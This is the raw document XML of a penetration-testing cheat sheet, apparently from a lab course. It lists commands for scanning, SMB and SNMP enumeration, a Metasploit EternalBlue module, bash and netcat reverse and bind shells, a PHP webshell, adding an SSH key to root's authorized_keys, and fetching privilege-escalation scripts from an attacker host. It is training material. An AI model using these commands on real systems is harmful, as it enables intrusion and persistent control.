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ns024xacrr5" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Tools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openvpn user.ovpn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to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ifconfig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our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networks accessible via the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ssh user@10.10.10.10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to a remote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ftp 10.129.42.253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FTP to a remote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tmux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tmux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ctrl+b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tmux: default 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prefix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tmux: new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prefix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tmux: switch to window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prefix shift+%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tmux: split pane vertically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prefix shift+"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tmux: split pane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prefix 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tmux: switch to the right pane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vim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open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 with vim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esc+i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enter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 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back to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 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Cut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Cut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Cut full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Copy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Copy full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Go to line number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Write the file 'i.e. save'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:q!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Quit without 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:wq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vim: Write and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8m3srowrhqd3" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pentesting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 Scanning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nmap 10.129.42.253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nmap on an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nmap -sV -sC -p- 10.129.42.253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an nmap script scan on an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locate scripts/citrix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various available nmap scripts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nmap --script smb-os-discovery.nse -p445 10.10.10.40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an nmap script on an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netcat 10.10.10.10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 banner of an open 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smbclient -N -L \\\\10.129.42.253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SMB Shares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smbclient \\\\10.129.42.253\\users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to an SMB share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snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0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SNMP on an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onesixtyone -c dict.txt 10.129.42.254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Brute force SNMP secret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Enumeration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gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt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 directory scan on a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gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt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 sub-domain scan on a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-IL https://www.inlanefreight.com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Grab website banner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whatweb 10.10.10.121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details about the webserver/certificates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10.10.10.121/robots.txt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potential directories in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robots.txt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ctrl+U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page source (in Firefox)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Exploits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searchsploit openssh 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public exploits for a web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msfconsole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Start the Metasploit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search exploit eternalblue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Search for public exploits in MSF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 exploit/windows/smb/ms17_010_psexec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Start using an MSF module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Show required options for an MSF module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 RHOSTS 10.10.10.40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Set a value for an MSF module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Test if the target server is vulnerable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exploit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MSF: Run the exploit on the target server is vulnerable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Using Shells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nc -lvnp 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a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nc</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> listener on a local 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-c 'bash -i &gt;&amp; /dev/tcp/10.10.10.10/1234 0&gt;&amp;1'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a reverse shell from the remote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 /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.10.10 1234 &gt;/tmp/f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command to send a reverse shell from the remote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 /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc -lvp 1234 &gt;/tmp/f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a bind shell on the remote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nc 10.10.10.1 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to a bind shell started on the remote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-c 'import pty; pty.spawn("/bin/bash")'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Upgrade shell TTY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ctrl+z</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> then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stty raw -echo</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> then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  <w:t xml:space="preserve"> then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  <w:t xml:space="preserve"> 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Upgrade shell TTY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"&lt;?php system(\$_GET['cmd']);?&gt;" &gt; /var/www/html/shell.php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webshell php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http://SERVER_IP:PORT/shell.php?cmd=id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 a command on an uploaded webshell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 Escalation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./linpeas.sh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linpeas</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> script to enumerate remote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available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</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> privileges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-u user /bin/echo Hello World!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 command with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su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root user (if we have access to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su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su user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a user (if we have access to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su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ssh-keygen -f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SSH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"ssh-rsa AAAAB...SNIP...M= user@parrot" &gt;&gt; /root/.ssh/authorized_keys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the generated public key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ssh root@10.10.10.10 -i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to the server with the generated private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Transferring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python3 -m http.server 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a local webserver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wget http://10.10.14.1:8000/linpeas.sh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a file on the remote server from our local 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http://10.10.14.1:8000/linenum.sh -o linenum.sh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a file on the remote server from our local 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scp linenum.sh user@remotehost:/tmp/linenum.sh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a file to the remote server with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scp</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (requires SSH access)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base64 shell -w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a file to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f0VMR...SNIO...InmDwU | base64 -d &gt; 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a file from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base64</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> back to its orig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md5sum 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file's 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md5sum</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to ensure it converted correctly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